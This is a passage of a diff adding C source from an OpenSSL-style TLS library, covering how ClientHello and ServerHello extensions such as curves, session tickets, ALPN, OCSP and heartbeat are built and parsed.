+        pcurves = s->tlsext_ellipticcurvelist;
+        if (!tls1_get_curvelist(s, 0, &pcurves, &num_curves))
+            return NULL;
+
+        if ((lenmax = limit - ret - 6) < 0)
+            return NULL;
+        if (num_curves > (size_t)lenmax / 2)
+            return NULL;
+        if (num_curves > 65532 / 2) {
+            SSLerr(SSL_F_SSL_ADD_CLIENTHELLO_TLSEXT, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+        curves_list_len = 2 * num_curves;
+        s2n(TLSEXT_TYPE_elliptic_curves, ret);
+        s2n(curves_list_len + 2, ret);
+        s2n(curves_list_len, ret);
+        memcpy(ret, pcurves, curves_list_len);
+        ret += curves_list_len;
+    }
+# endif                         /* OPENSSL_NO_EC */
+
+    if (!(SSL_get_options(s) & SSL_OP_NO_TICKET)) {
+        int ticklen;
+        if (!s->new_session && s->session && s->session->tlsext_tick)
+            ticklen = s->session->tlsext_ticklen;
+        else if (s->session && s->tlsext_session_ticket &&
+                 s->tlsext_session_ticket->data) {
+            ticklen = s->tlsext_session_ticket->length;
+            s->session->tlsext_tick = OPENSSL_malloc(ticklen);
+            if (!s->session->tlsext_tick)
+                return NULL;
+            memcpy(s->session->tlsext_tick,
+                   s->tlsext_session_ticket->data, ticklen);
+            s->session->tlsext_ticklen = ticklen;
+        } else
+            ticklen = 0;
+        if (ticklen == 0 && s->tlsext_session_ticket &&
+            s->tlsext_session_ticket->data == NULL)
+            goto skip_ext;
+        /*
+         * Check for enough room 2 for extension type, 2 for len rest for
+         * ticket
+         */
+        if ((long)(limit - ret - 4 - ticklen) < 0)
+            return NULL;
+        s2n(TLSEXT_TYPE_session_ticket, ret);
+        s2n(ticklen, ret);
+        if (ticklen) {
+            memcpy(ret, s->session->tlsext_tick, ticklen);
+            ret += ticklen;
+        }
+    }
+ skip_ext:
+
+    if (SSL_USE_SIGALGS(s)) {
+        size_t salglen;
+        const unsigned char *salg;
+        salglen = tls12_get_psigalgs(s, &salg);
+        if ((size_t)(limit - ret) < salglen + 6)
+            return NULL;
+        s2n(TLSEXT_TYPE_signature_algorithms, ret);
+        s2n(salglen + 2, ret);
+        s2n(salglen, ret);
+        memcpy(ret, salg, salglen);
+        ret += salglen;
+    }
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    if (s->s3->client_opaque_prf_input != NULL) {
+        size_t col = s->s3->client_opaque_prf_input_len;
+
+        if ((long)(limit - ret - 6 - col < 0))
+            return NULL;
+        if (col > 0xFFFD)       /* can't happen */
+            return NULL;
+
+        s2n(TLSEXT_TYPE_opaque_prf_input, ret);
+        s2n(col + 2, ret);
+        s2n(col, ret);
+        memcpy(ret, s->s3->client_opaque_prf_input, col);
+        ret += col;
+    }
+# endif
+
+    if (s->tlsext_status_type == TLSEXT_STATUSTYPE_ocsp) {
+        int i;
+        long extlen, idlen, itmp;
+        OCSP_RESPID *id;
+
+        idlen = 0;
+        for (i = 0; i < sk_OCSP_RESPID_num(s->tlsext_ocsp_ids); i++) {
+            id = sk_OCSP_RESPID_value(s->tlsext_ocsp_ids, i);
+            itmp = i2d_OCSP_RESPID(id, NULL);
+            if (itmp <= 0)
+                return NULL;
+            idlen += itmp + 2;
+        }
+
+        if (s->tlsext_ocsp_exts) {
+            extlen = i2d_X509_EXTENSIONS(s->tlsext_ocsp_exts, NULL);
+            if (extlen < 0)
+                return NULL;
+        } else
+            extlen = 0;
+
+        if ((long)(limit - ret - 7 - extlen - idlen) < 0)
+            return NULL;
+        s2n(TLSEXT_TYPE_status_request, ret);
+        if (extlen + idlen > 0xFFF0)
+            return NULL;
+        s2n(extlen + idlen + 5, ret);
+        *(ret++) = TLSEXT_STATUSTYPE_ocsp;
+        s2n(idlen, ret);
+        for (i = 0; i < sk_OCSP_RESPID_num(s->tlsext_ocsp_ids); i++) {
+            /* save position of id len */
+            unsigned char *q = ret;
+            id = sk_OCSP_RESPID_value(s->tlsext_ocsp_ids, i);
+            /* skip over id len */
+            ret += 2;
+            itmp = i2d_OCSP_RESPID(id, &ret);
+            /* write id len */
+            s2n(itmp, q);
+        }
+        s2n(extlen, ret);
+        if (extlen > 0)
+            i2d_X509_EXTENSIONS(s->tlsext_ocsp_exts, &ret);
+    }
+# ifndef OPENSSL_NO_HEARTBEATS
+    /* Add Heartbeat extension */
+    if ((limit - ret - 4 - 1) < 0)
+        return NULL;
+    s2n(TLSEXT_TYPE_heartbeat, ret);
+    s2n(1, ret);
+    /*-
+     * Set mode:
+     * 1: peer may send requests
+     * 2: peer not allowed to send requests
+     */
+    if (s->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_RECV_REQUESTS)
+        *(ret++) = SSL_TLSEXT_HB_DONT_SEND_REQUESTS;
+    else
+        *(ret++) = SSL_TLSEXT_HB_ENABLED;
+# endif
+
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    if (s->ctx->next_proto_select_cb && !s->s3->tmp.finish_md_len) {
+        /*
+         * The client advertises an emtpy extension to indicate its support
+         * for Next Protocol Negotiation
+         */
+        if (limit - ret - 4 < 0)
+            return NULL;
+        s2n(TLSEXT_TYPE_next_proto_neg, ret);
+        s2n(0, ret);
+    }
+# endif
+
+    if (s->alpn_client_proto_list && !s->s3->tmp.finish_md_len) {
+        if ((size_t)(limit - ret) < 6 + s->alpn_client_proto_list_len)
+            return NULL;
+        s2n(TLSEXT_TYPE_application_layer_protocol_negotiation, ret);
+        s2n(2 + s->alpn_client_proto_list_len, ret);
+        s2n(s->alpn_client_proto_list_len, ret);
+        memcpy(ret, s->alpn_client_proto_list, s->alpn_client_proto_list_len);
+        ret += s->alpn_client_proto_list_len;
+    }
+# ifndef OPENSSL_NO_SRTP
+    if (SSL_IS_DTLS(s) && SSL_get_srtp_profiles(s)) {
+        int el;
+
+        ssl_add_clienthello_use_srtp_ext(s, 0, &el, 0);
+
+        if ((limit - ret - 4 - el) < 0)
+            return NULL;
+
+        s2n(TLSEXT_TYPE_use_srtp, ret);
+        s2n(el, ret);
+
+        if (ssl_add_clienthello_use_srtp_ext(s, ret, &el, el)) {
+            SSLerr(SSL_F_SSL_ADD_CLIENTHELLO_TLSEXT, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+        ret += el;
+    }
+# endif
+    custom_ext_init(&s->cert->cli_ext);
+    /* Add custom TLS Extensions to ClientHello */
+    if (!custom_ext_add(s, 0, &ret, limit, al))
+        return NULL;
+
+    /*
+     * Add padding to workaround bugs in F5 terminators. See
+     * https://tools.ietf.org/html/draft-agl-tls-padding-03 NB: because this
+     * code works out the length of all existing extensions it MUST always
+     * appear last.
+     */
+    if (s->options & SSL_OP_TLSEXT_PADDING) {
+        int hlen = ret - (unsigned char *)s->init_buf->data;
+        /*
+         * The code in s23_clnt.c to build ClientHello messages includes the
+         * 5-byte record header in the buffer, while the code in s3_clnt.c
+         * does not.
+         */
+        if (s->state == SSL23_ST_CW_CLNT_HELLO_A)
+            hlen -= 5;
+        if (hlen > 0xff && hlen < 0x200) {
+            hlen = 0x200 - hlen;
+            if (hlen >= 4)
+                hlen -= 4;
+            else
+                hlen = 0;
+
+            s2n(TLSEXT_TYPE_padding, ret);
+            s2n(hlen, ret);
+            memset(ret, 0, hlen);
+            ret += hlen;
+        }
+    }
+
+    if ((extdatalen = ret - orig - 2) == 0)
+        return orig;
+
+    s2n(extdatalen, orig);
+    return ret;
+}
+
+unsigned char *ssl_add_serverhello_tlsext(SSL *s, unsigned char *buf,
+                                          unsigned char *limit, int *al)
+{
+    int extdatalen = 0;
+    unsigned char *orig = buf;
+    unsigned char *ret = buf;
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    int next_proto_neg_seen;
+# endif
+# ifndef OPENSSL_NO_EC
+    unsigned long alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
+    unsigned long alg_a = s->s3->tmp.new_cipher->algorithm_auth;
+    int using_ecc = (alg_k & (SSL_kEECDH | SSL_kECDHr | SSL_kECDHe))
+        || (alg_a & SSL_aECDSA);
+    using_ecc = using_ecc && (s->session->tlsext_ecpointformatlist != NULL);
+# endif
+    /*
+     * don't add extensions for SSLv3, unless doing secure renegotiation
+     */
+    if (s->version == SSL3_VERSION && !s->s3->send_connection_binding)
+        return orig;
+
+    ret += 2;
+    if (ret >= limit)
+        return NULL;            /* this really never occurs, but ... */
+
+    if (!s->hit && s->servername_done == 1
+        && s->session->tlsext_hostname != NULL) {
+        if ((long)(limit - ret - 4) < 0)
+            return NULL;
+
+        s2n(TLSEXT_TYPE_server_name, ret);
+        s2n(0, ret);
+    }
+
+    if (s->s3->send_connection_binding) {
+        int el;
+
+        if (!ssl_add_serverhello_renegotiate_ext(s, 0, &el, 0)) {
+            SSLerr(SSL_F_SSL_ADD_SERVERHELLO_TLSEXT, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+
+        if ((limit - ret - 4 - el) < 0)
+            return NULL;
+
+        s2n(TLSEXT_TYPE_renegotiate, ret);
+        s2n(el, ret);
+
+        if (!ssl_add_serverhello_renegotiate_ext(s, ret, &el, el)) {
+            SSLerr(SSL_F_SSL_ADD_SERVERHELLO_TLSEXT, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+
+        ret += el;
+    }
+# ifndef OPENSSL_NO_EC
+    if (using_ecc) {
+        const unsigned char *plist;
+        size_t plistlen;
+        /*
+         * Add TLS extension ECPointFormats to the ServerHello message
+         */
+        long lenmax;
+
+        tls1_get_formatlist(s, &plist, &plistlen);
+
+        if ((lenmax = limit - ret - 5) < 0)
+            return NULL;
+        if (plistlen > (size_t)lenmax)
+            return NULL;
+        if (plistlen > 255) {
+            SSLerr(SSL_F_SSL_ADD_SERVERHELLO_TLSEXT, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+
+        s2n(TLSEXT_TYPE_ec_point_formats, ret);
+        s2n(plistlen + 1, ret);
+        *(ret++) = (unsigned char)plistlen;
+        memcpy(ret, plist, plistlen);
+        ret += plistlen;
+
+    }
+    /*
+     * Currently the server should not respond with a SupportedCurves
+     * extension
+     */
+# endif                         /* OPENSSL_NO_EC */
+
+    if (s->tlsext_ticket_expected && !(SSL_get_options(s) & SSL_OP_NO_TICKET)) {
+        if ((long)(limit - ret - 4) < 0)
+            return NULL;
+        s2n(TLSEXT_TYPE_session_ticket, ret);
+        s2n(0, ret);
+    }
+
+    if (s->tlsext_status_expected) {
+        if ((long)(limit - ret - 4) < 0)
+            return NULL;
+        s2n(TLSEXT_TYPE_status_request, ret);
+        s2n(0, ret);
+    }
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    if (s->s3->server_opaque_prf_input != NULL) {
+        size_t sol = s->s3->server_opaque_prf_input_len;
+
+        if ((long)(limit - ret - 6 - sol) < 0)
+            return NULL;
+        if (sol > 0xFFFD)       /* can't happen */
+            return NULL;
+
+        s2n(TLSEXT_TYPE_opaque_prf_input, ret);
+        s2n(sol + 2, ret);
+        s2n(sol, ret);
+        memcpy(ret, s->s3->server_opaque_prf_input, sol);
+        ret += sol;
+    }
+# endif
+
+# ifndef OPENSSL_NO_SRTP
+    if (SSL_IS_DTLS(s) && s->srtp_profile) {
+        int el;
+
+        ssl_add_serverhello_use_srtp_ext(s, 0, &el, 0);
+
+        if ((limit - ret - 4 - el) < 0)
+            return NULL;
+
+        s2n(TLSEXT_TYPE_use_srtp, ret);
+        s2n(el, ret);
+
+        if (ssl_add_serverhello_use_srtp_ext(s, ret, &el, el)) {
+            SSLerr(SSL_F_SSL_ADD_SERVERHELLO_TLSEXT, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+        ret += el;
+    }
+# endif
+
+    if (((s->s3->tmp.new_cipher->id & 0xFFFF) == 0x80
+         || (s->s3->tmp.new_cipher->id & 0xFFFF) == 0x81)
+        && (SSL_get_options(s) & SSL_OP_CRYPTOPRO_TLSEXT_BUG)) {
+        const unsigned char cryptopro_ext[36] = {
+            0xfd, 0xe8,         /* 65000 */
+            0x00, 0x20,         /* 32 bytes length */
+            0x30, 0x1e, 0x30, 0x08, 0x06, 0x06, 0x2a, 0x85,
+            0x03, 0x02, 0x02, 0x09, 0x30, 0x08, 0x06, 0x06,
+            0x2a, 0x85, 0x03, 0x02, 0x02, 0x16, 0x30, 0x08,
+            0x06, 0x06, 0x2a, 0x85, 0x03, 0x02, 0x02, 0x17
+        };
+        if (limit - ret < 36)
+            return NULL;
+        memcpy(ret, cryptopro_ext, 36);
+        ret += 36;
+
+    }
+# ifndef OPENSSL_NO_HEARTBEATS
+    /* Add Heartbeat extension if we've received one */
+    if (s->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED) {
+        if ((limit - ret - 4 - 1) < 0)
+            return NULL;
+        s2n(TLSEXT_TYPE_heartbeat, ret);
+        s2n(1, ret);
+        /*-
+         * Set mode:
+         * 1: peer may send requests
+         * 2: peer not allowed to send requests
+         */
+        if (s->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_RECV_REQUESTS)
+            *(ret++) = SSL_TLSEXT_HB_DONT_SEND_REQUESTS;
+        else
+            *(ret++) = SSL_TLSEXT_HB_ENABLED;
+
+    }
+# endif
+
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    next_proto_neg_seen = s->s3->next_proto_neg_seen;
+    s->s3->next_proto_neg_seen = 0;
+    if (next_proto_neg_seen && s->ctx->next_protos_advertised_cb) {
+        const unsigned char *npa;
+        unsigned int npalen;
+        int r;
+
+        r = s->ctx->next_protos_advertised_cb(s, &npa, &npalen,
+                                              s->
+                                              ctx->next_protos_advertised_cb_arg);
+        if (r == SSL_TLSEXT_ERR_OK) {
+            if ((long)(limit - ret - 4 - npalen) < 0)
+                return NULL;
+            s2n(TLSEXT_TYPE_next_proto_neg, ret);
+            s2n(npalen, ret);
+            memcpy(ret, npa, npalen);
+            ret += npalen;
+            s->s3->next_proto_neg_seen = 1;
+        }
+    }
+# endif
+    if (!custom_ext_add(s, 1, &ret, limit, al))
+        return NULL;
+
+    if (s->s3->alpn_selected) {
+        const unsigned char *selected = s->s3->alpn_selected;
+        unsigned len = s->s3->alpn_selected_len;
+
+        if ((long)(limit - ret - 4 - 2 - 1 - len) < 0)
+            return NULL;
+        s2n(TLSEXT_TYPE_application_layer_protocol_negotiation, ret);
+        s2n(3 + len, ret);
+        s2n(1 + len, ret);
+        *ret++ = len;
+        memcpy(ret, selected, len);
+        ret += len;
+    }
+
+    if ((extdatalen = ret - orig - 2) == 0)
+        return orig;
+
+    s2n(extdatalen, orig);
+    return ret;
+}
+
+# ifndef OPENSSL_NO_EC
+/*-
+ * ssl_check_for_safari attempts to fingerprint Safari using OS X
+ * SecureTransport using the TLS extension block in |d|, of length |n|.
+ * Safari, since 10.6, sends exactly these extensions, in this order:
+ *   SNI,
+ *   elliptic_curves
+ *   ec_point_formats
+ *
+ * We wish to fingerprint Safari because they broke ECDHE-ECDSA support in 10.8,
+ * but they advertise support. So enabling ECDHE-ECDSA ciphers breaks them.
+ * Sadly we cannot differentiate 10.6, 10.7 and 10.8.4 (which work), from
+ * 10.8..10.8.3 (which don't work).
+ */
+static void ssl_check_for_safari(SSL *s, const unsigned char *data,
+                                 const unsigned char *d, int n)
+{
+    unsigned short type, size;
+    static const unsigned char kSafariExtensionsBlock[] = {
+        0x00, 0x0a,             /* elliptic_curves extension */
+        0x00, 0x08,             /* 8 bytes */
+        0x00, 0x06,             /* 6 bytes of curve ids */
+        0x00, 0x17,             /* P-256 */
+        0x00, 0x18,             /* P-384 */
+        0x00, 0x19,             /* P-521 */
+
+        0x00, 0x0b,             /* ec_point_formats */
+        0x00, 0x02,             /* 2 bytes */
+        0x01,                   /* 1 point format */
+        0x00,                   /* uncompressed */
+    };
+
+    /* The following is only present in TLS 1.2 */
+    static const unsigned char kSafariTLS12ExtensionsBlock[] = {
+        0x00, 0x0d,             /* signature_algorithms */
+        0x00, 0x0c,             /* 12 bytes */
+        0x00, 0x0a,             /* 10 bytes */
+        0x05, 0x01,             /* SHA-384/RSA */
+        0x04, 0x01,             /* SHA-256/RSA */
+        0x02, 0x01,             /* SHA-1/RSA */
+        0x04, 0x03,             /* SHA-256/ECDSA */
+        0x02, 0x03,             /* SHA-1/ECDSA */
+    };
+
+    if (data >= (d + n - 2))
+        return;
+    data += 2;
+
+    if (data > (d + n - 4))
+        return;
+    n2s(data, type);
+    n2s(data, size);
+
+    if (type != TLSEXT_TYPE_server_name)
+        return;
+
+    if (data + size > d + n)
+        return;
+    data += size;
+
+    if (TLS1_get_client_version(s) >= TLS1_2_VERSION) {
+        const size_t len1 = sizeof(kSafariExtensionsBlock);
+        const size_t len2 = sizeof(kSafariTLS12ExtensionsBlock);
+
+        if (data + len1 + len2 != d + n)
+            return;
+        if (memcmp(data, kSafariExtensionsBlock, len1) != 0)
+            return;
+        if (memcmp(data + len1, kSafariTLS12ExtensionsBlock, len2) != 0)
+            return;
+    } else {
+        const size_t len = sizeof(kSafariExtensionsBlock);
+
+        if (data + len != d + n)
+            return;
+        if (memcmp(data, kSafariExtensionsBlock, len) != 0)
+            return;
+    }
+
+    s->s3->is_probably_safari = 1;
+}
+# endif                         /* !OPENSSL_NO_EC */
+
+/*
+ * tls1_alpn_handle_client_hello is called to process the ALPN extension in a
+ * ClientHello.  data: the contents of the extension, not including the type
+ * and length.  data_len: the number of bytes in |data| al: a pointer to the
+ * alert value to send in the event of a non-zero return.  returns: 0 on
+ * success.
+ */
+static int tls1_alpn_handle_client_hello(SSL *s, const unsigned char *data,
+                                         unsigned data_len, int *al)
+{
+    unsigned i;
+    unsigned proto_len;
+    const unsigned char *selected;
+    unsigned char selected_len;
+    int r;
+
+    if (s->ctx->alpn_select_cb == NULL)
+        return 0;
+
+    if (data_len < 2)
+        goto parse_error;
+
+    /*
+     * data should contain a uint16 length followed by a series of 8-bit,
+     * length-prefixed strings.
+     */
+    i = ((unsigned)data[0]) << 8 | ((unsigned)data[1]);
+    data_len -= 2;
+    data += 2;
+    if (data_len != i)
+        goto parse_error;
+
+    if (data_len < 2)
+        goto parse_error;
+
+    for (i = 0; i < data_len;) {
+        proto_len = data[i];
+        i++;
+
+        if (proto_len == 0)
+            goto parse_error;
+
+        if (i + proto_len < i || i + proto_len > data_len)
+            goto parse_error;
+
+        i += proto_len;
+    }
+
+    r = s->ctx->alpn_select_cb(s, &selected, &selected_len, data, data_len,
+                               s->ctx->alpn_select_cb_arg);
+    if (r == SSL_TLSEXT_ERR_OK) {
+        if (s->s3->alpn_selected)
+            OPENSSL_free(s->s3->alpn_selected);
+        s->s3->alpn_selected = OPENSSL_malloc(selected_len);
+        if (!s->s3->alpn_selected) {
+            *al = SSL_AD_INTERNAL_ERROR;
+            return -1;
+        }
+        memcpy(s->s3->alpn_selected, selected, selected_len);
+        s->s3->alpn_selected_len = selected_len;
+    }
+    return 0;
+
+ parse_error:
+    *al = SSL_AD_DECODE_ERROR;
+    return -1;
+}
+
+static int ssl_scan_clienthello_tlsext(SSL *s, unsigned char **p,
+                                       unsigned char *d, int n, int *al)
+{
+    unsigned short type;
+    unsigned short size;
+    unsigned short len;
+    unsigned char *data = *p;
+    int renegotiate_seen = 0;
+
+    s->servername_done = 0;
+    s->tlsext_status_type = -1;
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    s->s3->next_proto_neg_seen = 0;
+# endif
+
+    if (s->s3->alpn_selected) {
+        OPENSSL_free(s->s3->alpn_selected);
+        s->s3->alpn_selected = NULL;
+    }
+# ifndef OPENSSL_NO_HEARTBEATS
+    s->tlsext_heartbeat &= ~(SSL_TLSEXT_HB_ENABLED |
+                             SSL_TLSEXT_HB_DONT_SEND_REQUESTS);
+# endif
+
+# ifndef OPENSSL_NO_EC
+    if (s->options & SSL_OP_SAFARI_ECDHE_ECDSA_BUG)
+        ssl_check_for_safari(s, data, d, n);
+# endif                         /* !OPENSSL_NO_EC */
+
+    /* Clear any signature algorithms extension received */
+    if (s->cert->peer_sigalgs) {
+        OPENSSL_free(s->cert->peer_sigalgs);
+        s->cert->peer_sigalgs = NULL;
+    }
+# ifndef OPENSSL_NO_SRP
+    if (s->srp_ctx.login != NULL) {
+        OPENSSL_free(s->srp_ctx.login);
+        s->srp_ctx.login = NULL;
+    }
+# endif
+
+    s->srtp_profile = NULL;
+
+    if (data >= (d + n - 2))
+        goto ri_check;
+    n2s(data, len);
+
+    if (data > (d + n - len))
+        goto ri_check;
+
+    while (data <= (d + n - 4)) {
+        n2s(data, type);
+        n2s(data, size);
+
+        if (data + size > (d + n))
+            goto ri_check;
+# if 0
+        fprintf(stderr, "Received extension type %d size %d\n", type, size);
+# endif
+        if (s->tlsext_debug_cb)
+            s->tlsext_debug_cb(s, 0, type, data, size, s->tlsext_debug_arg);
+/*-
+ * The servername extension is treated as follows:
+ *
+ * - Only the hostname type is supported with a maximum length of 255.
+ * - The servername is rejected if too long or if it contains zeros,
+ *   in which case an fatal alert is generated.
+ * - The servername field is maintained together with the session cache.
+ * - When a session is resumed, the servername call back invoked in order
+ *   to allow the application to position itself to the right context.
+ * - The servername is acknowledged if it is new for a session or when
+ *   it is identical to a previously used for the same session.
+ *   Applications can control the behaviour.  They can at any time
+ *   set a 'desirable' servername for a new SSL object. This can be the
+ *   case for example with HTTPS when a Host: header field is received and
+ *   a renegotiation is requested. In this case, a possible servername
+ *   presented in the new client hello is only acknowledged if it matches
+ *   the value of the Host: field.
+ * - Applications must  use SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION
+ *   if they provide for changing an explicit servername context for the
+ *   session, i.e. when the session has been established with a servername
+ *   extension.
+ * - On session reconnect, the servername extension may be absent.
+ *
+ */
+
+        if (type == TLSEXT_TYPE_server_name) {
+            unsigned char *sdata;
+            int servname_type;
+            int dsize;
+
+            if (size < 2) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+            n2s(data, dsize);
+            size -= 2;
+            if (dsize > size) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+
+            sdata = data;
+            while (dsize > 3) {
+                servname_type = *(sdata++);
+                n2s(sdata, len);
+                dsize -= 3;
+
+                if (len > dsize) {
+                    *al = SSL_AD_DECODE_ERROR;
+                    return 0;
+                }
+                if (s->servername_done == 0)
+                    switch (servname_type) {
+                    case TLSEXT_NAMETYPE_host_name:
+                        if (!s->hit) {
+                            if (s->session->tlsext_hostname) {
+                                *al = SSL_AD_DECODE_ERROR;
+                                return 0;
+                            }
+                            if (len > TLSEXT_MAXLEN_host_name) {
+                                *al = TLS1_AD_UNRECOGNIZED_NAME;
+                                return 0;
+                            }
+                            if ((s->session->tlsext_hostname =
+                                 OPENSSL_malloc(len + 1)) == NULL) {
+                                *al = TLS1_AD_INTERNAL_ERROR;
+                                return 0;
+                            }
+                            memcpy(s->session->tlsext_hostname, sdata, len);
+                            s->session->tlsext_hostname[len] = '\0';
+                            if (strlen(s->session->tlsext_hostname) != len) {
+                                OPENSSL_free(s->session->tlsext_hostname);
+                                s->session->tlsext_hostname = NULL;
+                                *al = TLS1_AD_UNRECOGNIZED_NAME;
+                                return 0;
+                            }
+                            s->servername_done = 1;
+
+                        } else
+                            s->servername_done = s->session->tlsext_hostname
+                                && strlen(s->session->tlsext_hostname) == len
+                                && strncmp(s->session->tlsext_hostname,
+                                           (char *)sdata, len) == 0;
+
+                        break;
+
+                    default:
+                        break;
+                    }
+
+                dsize -= len;
+            }
+            if (dsize != 0) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+
+        }
+# ifndef OPENSSL_NO_SRP
+        else if (type == TLSEXT_TYPE_srp) {
+            if (size <= 0 || ((len = data[0])) != (size - 1)) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+            if (s->srp_ctx.login != NULL) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+            if ((s->srp_ctx.login = OPENSSL_malloc(len + 1)) == NULL)
+                return -1;
+            memcpy(s->srp_ctx.login, &data[1], len);
+            s->srp_ctx.login[len] = '\0';
+
+            if (strlen(s->srp_ctx.login) != len) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+        }
+# endif
+
+# ifndef OPENSSL_NO_EC
+        else if (type == TLSEXT_TYPE_ec_point_formats) {
+            unsigned char *sdata = data;
+            int ecpointformatlist_length = *(sdata++);
+
+            if (ecpointformatlist_length != size - 1 ||
+                ecpointformatlist_length < 1) {
+                *al = TLS1_AD_DECODE_ERROR;
+                return 0;
+            }
+            if (!s->hit) {
+                if (s->session->tlsext_ecpointformatlist) {
+                    OPENSSL_free(s->session->tlsext_ecpointformatlist);
+                    s->session->tlsext_ecpointformatlist = NULL;
+                }
+                s->session->tlsext_ecpointformatlist_length = 0;
+                if ((s->session->tlsext_ecpointformatlist =
+                     OPENSSL_malloc(ecpointformatlist_length)) == NULL) {
+                    *al = TLS1_AD_INTERNAL_ERROR;
+                    return 0;
+                }
+                s->session->tlsext_ecpointformatlist_length =
+                    ecpointformatlist_length;
+                memcpy(s->session->tlsext_ecpointformatlist, sdata,
+                       ecpointformatlist_length);
+            }
+#  if 0
+            fprintf(stderr,
+                    "ssl_parse_clienthello_tlsext s->session->tlsext_ecpointformatlist (length=%i) ",
+                    s->session->tlsext_ecpointformatlist_length);
+            sdata = s->session->tlsext_ecpointformatlist;
+            for (i = 0; i < s->session->tlsext_ecpointformatlist_length; i++)
+                fprintf(stderr, "%i ", *(sdata++));
+            fprintf(stderr, "\n");
+#  endif
+        } else if (type == TLSEXT_TYPE_elliptic_curves) {
+            unsigned char *sdata = data;
+            int ellipticcurvelist_length = (*(sdata++) << 8);
+            ellipticcurvelist_length += (*(sdata++));
+
+            if (ellipticcurvelist_length != size - 2 ||
+                ellipticcurvelist_length < 1 ||
+                /* Each NamedCurve is 2 bytes. */
+                ellipticcurvelist_length & 1) {
+                *al = TLS1_AD_DECODE_ERROR;
+                return 0;
+            }
+            if (!s->hit) {
+                if (s->session->tlsext_ellipticcurvelist) {
+                    *al = TLS1_AD_DECODE_ERROR;
+                    return 0;
+                }
+                s->session->tlsext_ellipticcurvelist_length = 0;
+                if ((s->session->tlsext_ellipticcurvelist =
+                     OPENSSL_malloc(ellipticcurvelist_length)) == NULL) {
+                    *al = TLS1_AD_INTERNAL_ERROR;
+                    return 0;
+                }
+                s->session->tlsext_ellipticcurvelist_length =
+                    ellipticcurvelist_length;
+                memcpy(s->session->tlsext_ellipticcurvelist, sdata,
+                       ellipticcurvelist_length);
+            }
+#  if 0
+            fprintf(stderr,
+                    "ssl_parse_clienthello_tlsext s->session->tlsext_ellipticcurvelist (length=%i) ",
+                    s->session->tlsext_ellipticcurvelist_length);
+            sdata = s->session->tlsext_ellipticcurvelist;
+            for (i = 0; i < s->session->tlsext_ellipticcurvelist_length; i++)
+                fprintf(stderr, "%i ", *(sdata++));
+            fprintf(stderr, "\n");
+#  endif
+        }
+# endif                         /* OPENSSL_NO_EC */
+# ifdef TLSEXT_TYPE_opaque_prf_input
+        else if (type == TLSEXT_TYPE_opaque_prf_input) {
+            unsigned char *sdata = data;
+
+            if (size < 2) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+            n2s(sdata, s->s3->client_opaque_prf_input_len);
+            if (s->s3->client_opaque_prf_input_len != size - 2) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+
+            if (s->s3->client_opaque_prf_input != NULL) {
+                /* shouldn't really happen */
+                OPENSSL_free(s->s3->client_opaque_prf_input);
+            }
+
+            /* dummy byte just to get non-NULL */
+            if (s->s3->client_opaque_prf_input_len == 0)
+                s->s3->client_opaque_prf_input = OPENSSL_malloc(1);
+            else
+                s->s3->client_opaque_prf_input =
+                    BUF_memdup(sdata, s->s3->client_opaque_prf_input_len);
+            if (s->s3->client_opaque_prf_input == NULL) {
+                *al = TLS1_AD_INTERNAL_ERROR;
+                return 0;
+            }
+        }
+# endif
+        else if (type == TLSEXT_TYPE_session_ticket) {
+            if (s->tls_session_ticket_ext_cb &&
+                !s->tls_session_ticket_ext_cb(s, data, size,
+                                              s->tls_session_ticket_ext_cb_arg))
+            {
+                *al = TLS1_AD_INTERNAL_ERROR;
+                return 0;
+            }
+        } else if (type == TLSEXT_TYPE_renegotiate) {
+            if (!ssl_parse_clienthello_renegotiate_ext(s, data, size, al))
+                return 0;
+            renegotiate_seen = 1;
+        } else if (type == TLSEXT_TYPE_signature_algorithms) {
+            int dsize;
+            if (s->cert->peer_sigalgs || size < 2) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+            n2s(data, dsize);
+            size -= 2;
+            if (dsize != size || dsize & 1 || !dsize) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+            if (!tls1_save_sigalgs(s, data, dsize)) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+        } else if (type == TLSEXT_TYPE_status_request) {
+
+            if (size < 5) {
+                *al = SSL_AD_DECODE_ERROR;
+                return 0;
+            }
+
+            s->tlsext_status_type = *data++;
+            size--;
+            if (s->tlsext_status_type == TLSEXT_STATUSTYPE_ocsp) {
+                const unsigned char *sdata;
+                int dsize;
+                /* Read in responder_id_list */
+                n2s(data, dsize);
+                size -= 2;
+                if (dsize > size) {
+                    *al = SSL_AD_DECODE_ERROR;
+                    return 0;
+                }
+                while (dsize > 0) {
+                    OCSP_RESPID *id;
+                    int idsize;
+                    if (dsize < 4) {
+                        *al = SSL_AD_DECODE_ERROR;
+                        return 0;
+                    }
+                    n2s(data, idsize);
+                    dsize -= 2 + idsize;
+                    size -= 2 + idsize;
+                    if (dsize < 0) {
+                        *al = SSL_AD_DECODE_ERROR;
+                        return 0;
+                    }
+                    sdata = data;
+                    data += idsize;
+                    id = d2i_OCSP_RESPID(NULL, &sdata, idsize);
+                    if (!id) {
